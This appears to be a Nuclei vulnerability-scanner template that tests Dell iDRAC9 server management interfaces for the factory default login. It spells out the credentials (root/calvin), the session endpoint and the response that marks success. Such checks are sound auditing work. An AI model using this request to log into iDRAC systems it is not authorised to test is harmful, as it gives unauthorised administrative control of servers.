id: dell-idrac9-default-login

info:
  name: DELL iDRAC9 Default Login
  author: kophjager007,milo2012
  severity: high
  tags: dell,idrac,default-login

requests:
  - raw:
      - |
        POST /sysmgmt/2015/bmc/session HTTP/1.1
        Host: {{Hostname}}
        User: "{{username}}"
        Password: "{{password}}"

    payloads:
      username:
        - root
      password:
        - calvin
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 201
          - 200
        condition: or

      - type: word
        part: body
        words:
          - '"authResult":0'
